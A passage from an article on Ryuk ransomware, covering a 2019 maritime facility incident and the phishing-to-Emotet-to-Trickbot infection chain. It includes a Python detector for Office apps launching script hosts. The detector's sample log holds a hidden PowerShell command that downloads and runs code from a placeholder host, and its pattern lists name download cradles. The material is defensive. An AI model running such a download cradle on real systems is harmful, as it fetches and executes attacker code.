On December 16, 2019, the U.S. Coast Guard disclosed a security incident at a facility regulated by the Maritime Transportation Security Act (MTSA). Forensic analysis suggests that the incident might have begun when an employee clicked on a link embedded in a phishing email.

This action enabled a threat actor to set Ryuk ransomware loose on the facility’s network. Ultimately, the infection spread to all IT network files, leading Ryuk to disrupt the corporate IT network and prevent critical process control monitoring systems from functioning properly.

Phishing is one of the primary infection vectors for most ransomware families, but this particular family adds an interesting twist. As noted by Malwarebytes, a typical Ryuk attack begins when a user opens a weaponized Microsoft Office document attached to a phishing email. Opening the document causes a malicious macro to execute a PowerShell command that attempts to download the banking trojan Emotet. Emotet, in turn, can download additional malware onto the infected machine, which then retrieves and executes Trickbot.

This secondary payload, in turn, collects admin credentials, allowing digital attackers to move laterally to critical assets connected to the network. The attack chain concludes when the attackers execute Ryuk on each of these assets.
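The first link in the chain described above (an Office application launching PowerShell with a download command) is a pattern defenders can look for in process-creation telemetry. The following is an added example, not code from the article or from any vendor mentioned in it: a small Python detector run over constructed, tab-separated process-creation records. The field layout, host names, user names, command lines and the indicator lists are all assumptions made for illustration; the `stage.invalid` URL is a placeholder.

```python
"""Flag script hosts spawned by Office applications with download-style command lines.

Added illustration: the record format (tab-separated ts, host, user, parent image,
image, command line), the sample events and the indicator lists are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Parent processes that should rarely launch a script interpreter directly (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters a malicious macro typically chains into (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments associated with fetching a second stage (assumed, not exhaustive).
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I)
# Switches commonly used to hide or encode the invocation (assumed, not exhaustive).
OBFUSCATION_RE = re.compile(r"-enc(odedcommand)?\b|frombase64string|-w(indowstyle)?\s+hidden", re.I)


@dataclass
class ProcessEvent:
    ts: str
    host: str
    user: str
    parent_image: str
    image: str
    cmdline: str

    @property
    def parent_name(self) -> str:
        return PureWindowsPath(self.parent_image).name.lower()

    @property
    def image_name(self) -> str:
        return PureWindowsPath(self.image).name.lower()


def parse_event(line: str) -> ProcessEvent:
    """Parse one tab-separated record into a ProcessEvent; reject malformed lines."""
    fields = line.rstrip("\n").split("\t", 5)
    if len(fields) != 6:
        raise ValueError(f"malformed record: {line!r}")
    return ProcessEvent(*fields)


def assess(event: ProcessEvent) -> list[str]:
    """Return the indicators that fire for this event (empty list means nothing suspicious)."""
    reasons: list[str] = []
    if event.image_name in SCRIPT_HOSTS:
        if event.parent_name in OFFICE_PARENTS:
            reasons.append("office_app_spawned_script_host")
        if DOWNLOAD_RE.search(event.cmdline):
            reasons.append("download_cradle_in_cmdline")
        if OBFUSCATION_RE.search(event.cmdline):
            reasons.append("hidden_or_encoded_execution")
    return reasons


def severity(reasons: list[str]) -> str:
    """Office parent plus any second indicator is high; a single indicator is medium."""
    if "office_app_spawned_script_host" in reasons and len(reasons) > 1:
        return "high"
    return "medium" if reasons else "none"


def scan(log_text: str) -> list[dict]:
    """Run assess() over every record and return one alert dict per suspicious event."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = assess(ev)
        if reasons:
            alerts.append({"ts": ev.ts, "host": ev.host, "user": ev.user,
                           "parent": ev.parent_name, "image": ev.image_name,
                           "reasons": reasons, "severity": severity(reasons)})
    return alerts


# Constructed sample telemetry: one macro-style chain, one benign admin use of
# PowerShell, one Office-spawned cmd.exe with no download, one unrelated service.
SAMPLE_LOG = "\n".join("\t".join(rec) for rec in [
    ("2019-12-16T09:12:03Z", "WS-101", "CORP\\jdoe",
     r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/a')"),
    ("2019-12-16T09:15:41Z", "WS-102", "CORP\\asmith",
     r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell Get-ChildItem C:\\Reports | Measure-Object"),
    ("2019-12-16T09:20:09Z", "WS-103", "CORP\\bnguyen",
     r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c echo macro-started"),
    ("2019-12-16T09:22:57Z", "SRV-FILE01", "NT AUTHORITY\\SYSTEM",
     r"C:\Windows\System32\services.exe",
     r"C:\Windows\System32\svchost.exe",
     "svchost.exe -k netsvcs"),
])

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["severity"].upper(), alert["host"], alert["parent"], "->", alert["image"], alert["reasons"])
```

Run as a script, the block reports the Word-to-PowerShell download as high severity and the Excel-to-cmd.exe launch as medium, while the administrator's PowerShell session and the service host produce no alert. The parent/child relationship is what carries the signal; the command-line patterns only raise the severity, because an attacker can rephrase a download cradle far more easily than they can avoid the Office application being the parent of the interpreter.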

Ransomware victims without a data backup they can restore from are always in a bad position. In the case of Ryuk, it’s especially bad. McAfee reported in February 2019 that the typical Ryuk ransom demand amounted to $145,000, more than 10 times the average ransomware demand. Ryuk’s handlers were sometimes willing to negotiate; even then, the average ransom amount after negotiation was still as high as $71,000.

Recent Attacks Involving Ryuk Ransomware

The security community documented numerous Ryuk attacks in 2019. Even so, the ransomware had a particularly busy final quarter. Here are just some of the infections that made headlines during this three-month period.